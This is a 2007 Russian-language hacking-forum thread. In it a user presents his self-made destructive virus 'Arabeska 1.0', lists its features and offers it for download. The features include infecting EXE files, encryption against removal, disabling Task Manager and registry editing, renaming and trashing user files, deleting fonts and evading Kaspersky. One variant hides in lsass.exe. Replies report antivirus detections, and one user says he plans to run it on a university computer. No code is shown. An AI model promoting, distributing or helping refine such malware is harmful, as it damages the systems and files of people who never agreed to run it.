Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Защита ОС: вирусы, антивирусы, файрволы. (https://forum.antichat.xyz/forumdisplay.php?f=80)
-   -   Мой вирус Арабеска 1.0 (https://forum.antichat.xyz/showthread.php?t=36585)

gold-goblin 28.03.2007 17:29
Мой вирус Арабеска 1.0
 
Это мой второй вирус который я написал.
Вирус написан на измененных и дописаных исходниках старых вирей (Конечно присутствует и мой код).
Его функции:

1) Заражать ЕХЕ файлы на винчестере где находится (Почти все ЕХЕ остаются живы)
2) Для беспалевности не заражает критические файлы винды (Для беспалевности)
3) Стартует с дисков и дискет
4) Путоет код файла (Для трудного лечения)
5) Шифровка (Для трудного лечения и определения)
6) Скрывает диски в проводнике
7) Запрещяет панель управления
8) Запрещяет диспечер задач
9) Запрещяет редактирование реестра
10) Меняет кнопки мыши
11) Мусорит в папке где находится
12) Переименовать все на рабочем столе в "Это вирус"
13) Переименовать мои документы в "Документы вируса"
14) Переименовать все в моих документах на "Файлы вируса"
15) Удоляет шрефты
16) Очищяет меню пуск

Я сделал несколько версий виря.

1) Полностью готовая к использованию.
Недочеты:
а) Старт через папку авто загрузки.
б) Состоит из 3 файлов

Действия:
а) после двайного клика по ехе файлу вирус копируется в папку систем32
б) остальное было описано выше

2) Фаил одностарт
Недочеты:
а) Не имеет автозагрузки

Действия:
а) при старте выполняет все как и аписано

3)Системный процесс
Отличия:
а) Инсталлер содержится в системном процессе lsass.ехе
б) Перезаписывается при каждом старте системы

Недочеты:
а) фаил lsass.ехе предется заменять в ручную.

Вирус проверялся на винде сервис пак 2. (Но без обнавлений и антивирусов)

В спокойной обстановке не палится касперским.

Кто найдет сбой в работе вируса очень прошу отпишитесь тут с полным описанием ошиби.

И пожалуйста критикуйте (Но не сильно) :)

Скачатьфаил со всеми версиями : Тырк

-FARAON2005RAMSES- 28.03.2007 20:07
ГгГгГ :) Почти все exe остаются живы... ХЕХ :)

На своём компе тыкать не буду а вот в универе обязательно проверю :)))) у них там win2000 Вот сисадмину урок будет что антивирус надо АБНАВЛЯТЬ! :))))

Lesnoy_chelovek 28.03.2007 21:29
Уже даже при закачке антивирь закричал.

GreenBear 28.03.2007 21:37
я бы за такое пиздюлей дал, понимаю трояны еще хоть куда не шло, но тупо пахабить =\

GROB_T 28.03.2007 21:41
gold-goblin, на каком языке написан вирь? И еще вопрос - этот exe,который ты выложил, как я понял по тому что видно по блокнотному изучению, что там что-то вроде менюшки выбора типа вируса, но рисковать все-таки не стал, после открытия exe ничего опасного не происходит?

+toxa+ 28.03.2007 22:53
Напоминает анек про молдавский вирус, типа "наши разработчики настока необразованы, что не смогли сделать норм вирус. пожалуйста, удалите всё сами"

Sn@k3 28.03.2007 23:15
жесть, моню я что-то вроде такого кидал, но это извращение, пише трояны, пряльно мажкА)

Kest 29.03.2007 01:10
Мне название понравилось
TELO.exe

gold-goblin 29.03.2007 16:19
GROB_T
Вирус написан на 2 языках.
1) Паскаль
2) ВБ скрипт

Да ты прав ничего не произойдет при запуске, это программа с помощью которого можно выбрать версию вируса (Описано выше)

Lesnoy_chelovek

Какой у тебя антивирус???
Касперский у меня молчит.

Sn@k3

Я пока только изучаю работу программ через сетевые протоколы, так-что когда смогу то напишу.

Lesnoy_chelovek 29.03.2007 16:50
gold-goblin, AntiVir - немецкий. (:

gold-goblin 29.03.2007 17:02
Lesnoy_chelovek

Кульно. Значит он лучше касперскова.

-faraon2005ramses-

Я кстати не уверен что под 2000 вирь потянет, я писал его под ХП.
Отпишись о полученых результатах, ладно?

TANZWUT 29.03.2007 17:47
НОД32 при загрузке файла выдал:
29.03.2007 17:41:49 IMON http://tatoine.clan.su/TELO.exe Win32/TrojanDropper.Small.NFB

gold-goblin 29.03.2007 21:15
Внимание!!!
Я нашол серьезную ошибку в своем вирусе!!!
К завтрошнему вечеру постараюсь исправить.
Простите за такое не удобство.


Глюк:
На пропатченной винде (ХП сп2) вирус не может инсталироватся и запустится.

Тагже к завтрому попробую исправить проблемы с антивирусами.

darckmilord 25.04.2007 23:01
У меня Доктор Вед впалил при закачке))))).
Но все равно молодец, держи +.
Буду ждать резы с обновами)))). Удачи

alextoun 25.04.2007 23:14
Цитата:
Мой вирус Арабеска 1.0
назови лучше так
Долбонеску через зановеску))
Цитата:
Напоминает анек про молдавский вирус, типа "наши разработчики настока необразованы, что не смогли сделать норм вирус. пожалуйста, удалите всё сами"
Здраствуйте. Это молдавский вирус. В связи с бедностью нашей страны и невыскокими знаниями моего разработчика, я не могу принести вред вашему копмьютеру, поэтому, пожалуйста, удалить какой-нибудь важый для себя файл сами, и разошлите меня по списку контрактов :d :D

miniden 28.04.2007 17:51
битдефендер заявил что это пинч...

gold-goblin 28.04.2007 17:56
Цитата:
битдефендер заявил что это пинч...
Пинч???
Если я не ошибаюсь пинч на асэмблере написан а тут все на паскале и Vb!!!
Может крышка едет у битдефендер.

Fata1ex 28.04.2007 18:00
Тут недавно калькулятор стал мегатроем...че токо не случается...+ за вирус

Ch3ck 28.04.2007 18:18
Цитата:
Вирус написан на измененных и дописаных исходниках старых вирей (Конечно присутствует и мой код)
А вдруг нет...
Мне вот это понравилось:
Цитата:
11) Мусорит в папке где находится
12) Переименовать все на рабочем столе в "Это вирус"
13) Переименовать мои документы в "Документы вируса"
14) Переименовать все в моих документах на "Файлы вируса"
Зато он не изменяет "критический файлов". для беспалевности...

gold-goblin 28.04.2007 23:18
BlackLogic

Зато знаеш как прикольно кагда он заразит ехе файлы во всех папках и будет мусорить там.
Комп при этом грузится так что мама не горюй

gold-goblin 28.04.2007 23:30
Боюсь новых версий арабески не будет :( я подхватил вирус и пришлось все сносить.
Буду писать новый вирь. Скоро ждите

ShadOS 01.05.2007 22:37
Во избежание флейма топик закрыт. В следующий раз влеплю много минусов любителям поржать.


Время: 00:16